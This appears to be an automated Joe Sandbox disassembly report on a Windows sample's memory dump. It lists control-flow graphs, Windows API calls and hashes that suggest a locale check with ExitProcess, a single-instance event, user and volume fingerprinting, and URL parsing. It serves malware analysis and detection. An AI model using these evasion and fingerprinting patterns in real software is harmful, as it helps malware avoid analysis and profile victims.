                              control_flow_graph 1570 5b1bd0-5b1beb call 5929a0 call 5b63c0 1575 5b1bfa-5b1c07 call 592840 1570->1575 1576 5b1bed 1570->1576 1580 5b1c09-5b1c0f lstrcpy 1575->1580 1581 5b1c15-5b1c26 GetUserDefaultLangID 1575->1581 1577 5b1bf0-5b1bf8 1576->1577 1577->1575 1577->1577 1580->1581 1582 5b1c28-5b1c2f 1581->1582 1583 5b1c3e-5b1c50 call 5b2a70 call 5b3db0 1581->1583 1582->1583 1584 5b1c36-5b1c38 ExitProcess 1582->1584 1589 5b1c6d-5b1c8c lstrlen call 592840 1583->1589 1590 5b1c52-5b1c64 call 5b29e0 call 5b3db0 1583->1590 1595 5b1ca9-5b1cc6 lstrlen call 592840 1589->1595 1596 5b1c8e-5b1c93 1589->1596 1590->1589 1603 5b1c66-5b1c67 ExitProcess 1590->1603 1604 5b1cc8-5b1cca 1595->1604 1605 5b1ce0-5b1d01 call 5b2a70 lstrlen call 592840 1595->1605 1596->1595 1598 5b1c95-5b1c97 1596->1598 1598->1595 1601 5b1c99-5b1ca3 lstrcpy lstrcat 1598->1601 1601->1595 1604->1605 1606 5b1ccc-5b1cda lstrcpy lstrcat 1604->1606 1611 5b1d03-5b1d05 1605->1611 1612 5b1d20-5b1d3a lstrlen call 592840 1605->1612 1606->1605 1611->1612 1614 5b1d07-5b1d0b 1611->1614 1617 5b1d3c-5b1d3e 1612->1617 1618 5b1d54-5b1d71 call 5b29e0 lstrlen call 592840 1612->1618 1614->1612 1616 5b1d0d-5b1d1a lstrcpy lstrcat 1614->1616 1616->1612 1617->1618 1619 5b1d40-5b1d4e lstrcpy lstrcat 1617->1619 1624 5b1d73-5b1d75 1618->1624 1625 5b1d90-5b1d95 1618->1625 1619->1618 1624->1625 1626 5b1d77-5b1d7b 1624->1626 1627 5b1d9c-5b1da8 call 592840 1625->1627 1628 5b1d97 call 592930 1625->1628 1626->1625 1630 5b1d7d-5b1d8a lstrcpy lstrcat 1626->1630 1633 5b1daa-5b1dac 1627->1633 1634 5b1db6-5b1dec call 592930 * 5 OpenEventA 1627->1634 1628->1627 1630->1625 1633->1634 1635 5b1dae-5b1db0 lstrcpy 1633->1635 1646 5b1dee 1634->1646 1647 5b1e14-5b1e28 CreateEventA call 5b1b00 call 5b01d0 1634->1647 1635->1634 1648 5b1df0-5b1e12 CloseHandle Sleep OpenEventA 1646->1648 1652 5b1e2d-5b1e36 CloseHandle ExitProcess 1647->1652 1648->1647 1648->1648
                              APIs
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602700), ref: 005B6419
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,016028E0), ref: 005B6432
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,016028B0), ref: 005B644A
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602940), ref: 005B6462
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,016095C8), ref: 005B647B
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,015F53D0), ref: 005B6493
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,015F52F0), ref: 005B64AB
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602718), ref: 005B64C4
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,016028F8), ref: 005B64DC
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602850), ref: 005B64F4
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602730), ref: 005B650D
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,015F5310), ref: 005B6525
                                • Part of subcall function 005B63C0: GetProcAddress.KERNEL32(74DD0000,01602748), ref: 005B653D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B1C0F
                              • GetUserDefaultLangID.KERNEL32 ref: 005B1C15
                              • ExitProcess.KERNEL32 ref: 005B1C38
                              • ExitProcess.KERNEL32 ref: 005B1C67
                              • lstrlen.KERNEL32(016093D8), ref: 005B1C74
                              • lstrcpy.KERNEL32(00000000,?), ref: 005B1C9B
                              • lstrcat.KERNEL32(00000000,016093D8), ref: 005B1CA3
                              • lstrlen.KERNEL32(005C5160), ref: 005B1CAE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1CCE
                              • lstrcat.KERNEL32(00000000,005C5160), ref: 005B1CDA
                              • lstrlen.KERNEL32(00000000), ref: 005B1CE9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1D0F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1D1A
                              • lstrlen.KERNEL32(005C5160), ref: 005B1D25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1D42
                              • lstrcat.KERNEL32(00000000,005C5160), ref: 005B1D4E
                              • lstrlen.KERNEL32(00000000), ref: 005B1D5D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1D7F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1D8A
                                • Part of subcall function 005B29E0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 005B2A0F
                                • Part of subcall function 005B29E0: RtlAllocateHeap.NTDLL(00000000), ref: 005B2A16
                                • Part of subcall function 005B29E0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 005B2A2A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1DB0
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 005B1DE4
                              • CloseHandle.KERNEL32(00000000), ref: 005B1DF1
                              • Sleep.KERNEL32(00001770), ref: 005B1DFC
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 005B1E0A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005B1E1B
                              • CloseHandle.KERNEL32(00000000), ref: 005B1E2E
                              • ExitProcess.KERNEL32 ref: 005B1E36
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$lstrcpy$lstrcatlstrlen$Process$EventExit$CloseHandleHeapOpenUser$AllocateCreateDefaultLangNameSleep
                              • String ID:
                              • API String ID: 4175272417-0
                              • Opcode ID: 20d34ce847fa9ad91b55344cae7587f1e25d580fc2f76e86e27e813444e34130
                              • Instruction ID: 30f7c21eaa31fb891afe84213bc16986b9a9a858ef6e899380ee9f1e763d663d
                              • Opcode Fuzzy Hash: 20d34ce847fa9ad91b55344cae7587f1e25d580fc2f76e86e27e813444e34130
                              • Instruction Fuzzy Hash: EE616031901606AFCBA1ABB0DC9DFAF7F79BF80741F548028F90596161EB38AC058769
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B022F
                              • lstrlen.KERNEL32(005BD014), ref: 005B0250
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0285
                              • lstrlen.KERNEL32(005BD014), ref: 005B0290
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B02C5
                              • lstrlen.KERNEL32(005BD014), ref: 005B02D0
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0305
                              • lstrlen.KERNEL32(005BD014), ref: 005B0321
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0356
                              • lstrlen.KERNEL32(005BD014), ref: 005B0361
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0393
                              • lstrlen.KERNEL32(005BD014), ref: 005B039E
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B03CA
                              • lstrlen.KERNEL32(005BD014), ref: 005B03F5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B0421
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: fplugins
                              • API String ID: 367037083-38756186
                              • Opcode ID: 7d76a6c321e2ad8b05748740b4a13d287f0c7a32828a8a8a950a4ebd44bc80e1
                              • Instruction ID: a10bb39d2401e10473c9423711cf8148cfd7940ca5877cb3b51851b11c33f705
                              • Opcode Fuzzy Hash: 7d76a6c321e2ad8b05748740b4a13d287f0c7a32828a8a8a950a4ebd44bc80e1
                              • Instruction Fuzzy Hash: 7ED26B70A012058FDB64DF29C899BA9BBF0BF48314F5981ADD40C9B2A2DB35ED85CF51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2250 5a8d00-5a8d24 StrCmpCA 2251 5a8d2d-5a8d46 2250->2251 2252 5a8d26-5a8d27 ExitProcess 2250->2252 2254 5a8d4c-5a8d51 2251->2254 2255 5a8f42-5a8f4f call 592930 2251->2255 2257 5a8d56-5a8d59 2254->2257 2259 5a8d5f 2257->2259 2260 5a8f23-5a8f3c 2257->2260 2261 5a8dba-5a8dc9 lstrlen 2259->2261 2262 5a8e1d-5a8e2b StrCmpCA 2259->2262 2263 5a8e3d-5a8e4b StrCmpCA 2259->2263 2264 5a8e5d-5a8e6b StrCmpCA 2259->2264 2265 5a8e7d-5a8e8b StrCmpCA 2259->2265 2266 5a8e9d-5a8eab StrCmpCA 2259->2266 2267 5a8d90-5a8d9f lstrlen 2259->2267 2268 5a8eb6-5a8ec4 StrCmpCA 2259->2268 2269 5a8ee8-5a8efa lstrlen 2259->2269 2270 5a8ecf-5a8edd StrCmpCA 2259->2270 2271 5a8d66-5a8d75 lstrlen 2259->2271 2272 5a8de4-5a8df2 StrCmpCA 2259->2272 2273 5a8e04-5a8e18 StrCmpCA 2259->2273 2260->2255 2299 5a8d53 2260->2299 2288 5a8dcb-5a8dd0 call 592930 2261->2288 2289 5a8dd3-5a8ddf call 592840 2261->2289 2262->2260 2275 5a8e31-5a8e38 2262->2275 2263->2260 2276 5a8e51-5a8e58 2263->2276 2264->2260 2277 5a8e71-5a8e78 2264->2277 2265->2260 2278 5a8e91-5a8e98 2265->2278 2266->2260 2279 5a8ead-5a8eb4 2266->2279 2286 5a8da9-5a8db5 call 592840 2267->2286 2287 5a8da1-5a8da6 call 592930 2267->2287 2268->2260 2282 5a8ec6-5a8ecd 2268->2282 2284 5a8efc-5a8f01 call 592930 2269->2284 2285 5a8f04-5a8f10 call 592840 2269->2285 2270->2260 2283 5a8edf-5a8ee6 2270->2283 2280 5a8d7f-5a8d8b call 592840 2271->2280 2281 5a8d77-5a8d7c call 592930 2271->2281 2272->2260 2274 5a8df8-5a8dff 2272->2274 2273->2260 2274->2260 2275->2260 2276->2260 2277->2260 2278->2260 2279->2260 2308 5a8f13-5a8f15 2280->2308 2281->2280 2282->2260 2283->2260 2284->2285 2285->2308 2286->2308 2287->2286 2288->2289 2289->2308 2299->2257 2308->2260 2309 5a8f17-5a8f19 2308->2309 2309->2260 2310 5a8f1b-5a8f1d lstrcpy 2309->2310 2310->2260
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: aecbcdd8d160b1b5a2e05a4b10b8a19278b6a00c03dfa5f96a72919c35e8a762
                              • Instruction ID: d933edc76ad27c603d78d74543ec73b98e7f359fde692f3d75b4bc8cdb58458d
                              • Opcode Fuzzy Hash: aecbcdd8d160b1b5a2e05a4b10b8a19278b6a00c03dfa5f96a72919c35e8a762
                              • Instruction Fuzzy Hash: 2F5149B1604702AFCB209FA5D888E7E7FF5FB46704B10882DE952D6660EB78E481CB51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2311 5b26e0-5b2723 GetWindowsDirectoryA 2312 5b272c-5b278a GetVolumeInformationA 2311->2312 2313 5b2725 2311->2313 2314 5b278c-5b2792 2312->2314 2313->2312 2315 5b27a9-5b27c0 GetProcessHeap RtlAllocateHeap 2314->2315 2316 5b2794-5b27a7 2314->2316 2317 5b27c2-5b27c4 2315->2317 2318 5b27c6-5b27e4 wsprintfA 2315->2318 2316->2314 2319 5b27fb-5b2812 call 5b7210 2317->2319 2318->2319
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 005B271B
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,005A9416,00000000,00000000,00000000,00000000), ref: 005B274C
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005B27AF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B27B6
                              • wsprintfA.USER32 ref: 005B27DB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                              • String ID: :\$C
                              • API String ID: 2572753744-3309953409
                              • Opcode ID: ce8876df83ffeef61e6e0458eefc475d7a6b47008f08af8fbf79e7696c64b116
                              • Instruction ID: 150003d2e19e9b4833cd088aeafbdcb63439cd19ff97c767b5d1b93b21f63c4d
                              • Opcode Fuzzy Hash: ce8876df83ffeef61e6e0458eefc475d7a6b47008f08af8fbf79e7696c64b116
                              • Instruction Fuzzy Hash: 4C316FB19082499BCB14CFB899899EFFFB8FF5C700F10416DE505E7650E6349A408BB5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2322 594ae0-594aee 2323 594af0-594af5 2322->2323 2323->2323 2324 594af7-594b68 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 592930 2323->2324
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00594B17
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00594B21
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00594B2B
                              • lstrlen.KERNEL32(?,00000000,?), ref: 00594B3F
                              • InternetCrackUrlA.WININET(?,00000000), ref: 00594B47
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: e09828a60a640e22be71afd9b086ec9c22cbbc8b1ed242ef9b6d26c0e8dd47c9
                              • Instruction ID: 019530663ddfdb48b647b34f195affdeedfb9f3385906253bf9f5b5f51be1c39
                              • Opcode Fuzzy Hash: e09828a60a640e22be71afd9b086ec9c22cbbc8b1ed242ef9b6d26c0e8dd47c9
                              • Instruction Fuzzy Hash: A7012D71D00218ABDB40DFA8EC49B9EBBB8EB48320F00812AF954E7390DBB459058FD5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2327 5aefe0-5af005 call 592840 2330 5af019-5af01d call 596b80 2327->2330 2331 5af007-5af00f 2327->2331 2334 5af022-5af038 StrCmpCA 2330->2334 2331->2330 2332 5af011-5af013 lstrcpy 2331->2332 2332->2330 2335 5af03a-5af052 call 592930 call 592840 2334->2335 2336 5af061-5af068 call 592930 2334->2336 2346 5af054-5af05c 2335->2346 2347 5af095-5af0f0 call 592930 * 10 2335->2347 2341 5af070-5af078 2336->2341 2341->2341 2343 5af07a-5af087 call 592840 2341->2343 2343->2347 2352 5af089 2343->2352 2346->2347 2348 5af05e-5af05f 2346->2348 2351 5af08e-5af08f lstrcpy 2348->2351 2351->2347 2352->2351
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AF013
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 005AF02E
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 005AF08F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: ERROR
                              • API String ID: 3722407311-2861137601
                              • Opcode ID: c1f5bd996dcc5776456743d239a9d0ba0316ba3e76a3451b4cd95a67835459f6
                              • Instruction ID: 1a0431954e4be6ac57580b6b2f3d32bc40b36c1188bdc39983371ace8e98c417
                              • Opcode Fuzzy Hash: c1f5bd996dcc5776456743d239a9d0ba0316ba3e76a3451b4cd95a67835459f6
                              • Instruction Fuzzy Hash: 73211270621207AFCF24BFB9DC4EA9E3FA4FF45704F444524B849DB212EA34E8918790

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2408 5a8ce1-5a8d24 StrCmpCA 2410 5a8d2d-5a8d46 2408->2410 2411 5a8d26-5a8d27 ExitProcess 2408->2411 2413 5a8d4c-5a8d51 2410->2413 2414 5a8f42-5a8f4f call 592930 2410->2414 2416 5a8d56-5a8d59 2413->2416 2418 5a8d5f 2416->2418 2419 5a8f23-5a8f3c 2416->2419 2420 5a8dba-5a8dc9 lstrlen 2418->2420 2421 5a8e1d-5a8e2b StrCmpCA 2418->2421 2422 5a8e3d-5a8e4b StrCmpCA 2418->2422 2423 5a8e5d-5a8e6b StrCmpCA 2418->2423 2424 5a8e7d-5a8e8b StrCmpCA 2418->2424 2425 5a8e9d-5a8eab StrCmpCA 2418->2425 2426 5a8d90-5a8d9f lstrlen 2418->2426 2427 5a8eb6-5a8ec4 StrCmpCA 2418->2427 2428 5a8ee8-5a8efa lstrlen 2418->2428 2429 5a8ecf-5a8edd StrCmpCA 2418->2429 2430 5a8d66-5a8d75 lstrlen 2418->2430 2431 5a8de4-5a8df2 StrCmpCA 2418->2431 2432 5a8e04-5a8e18 StrCmpCA 2418->2432 2419->2414 2458 5a8d53 2419->2458 2447 5a8dcb-5a8dd0 call 592930 2420->2447 2448 5a8dd3-5a8ddf call 592840 2420->2448 2421->2419 2434 5a8e31-5a8e38 2421->2434 2422->2419 2435 5a8e51-5a8e58 2422->2435 2423->2419 2436 5a8e71-5a8e78 2423->2436 2424->2419 2437 5a8e91-5a8e98 2424->2437 2425->2419 2438 5a8ead-5a8eb4 2425->2438 2445 5a8da9-5a8db5 call 592840 2426->2445 2446 5a8da1-5a8da6 call 592930 2426->2446 2427->2419 2441 5a8ec6-5a8ecd 2427->2441 2443 5a8efc-5a8f01 call 592930 2428->2443 2444 5a8f04-5a8f10 call 592840 2428->2444 2429->2419 2442 5a8edf-5a8ee6 2429->2442 2439 5a8d7f-5a8d8b call 592840 2430->2439 2440 5a8d77-5a8d7c call 592930 2430->2440 2431->2419 2433 5a8df8-5a8dff 2431->2433 2432->2419 2433->2419 2434->2419 2435->2419 2436->2419 2437->2419 2438->2419 2467 5a8f13-5a8f15 2439->2467 2440->2439 2441->2419 2442->2419 2443->2444 2444->2467 2445->2467 2446->2445 2447->2448 2448->2467 2458->2416 2467->2419 2468 5a8f17-5a8f19 2467->2468 2468->2419 2469 5a8f1b-5a8f1d lstrcpy 2468->2469 2469->2419
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
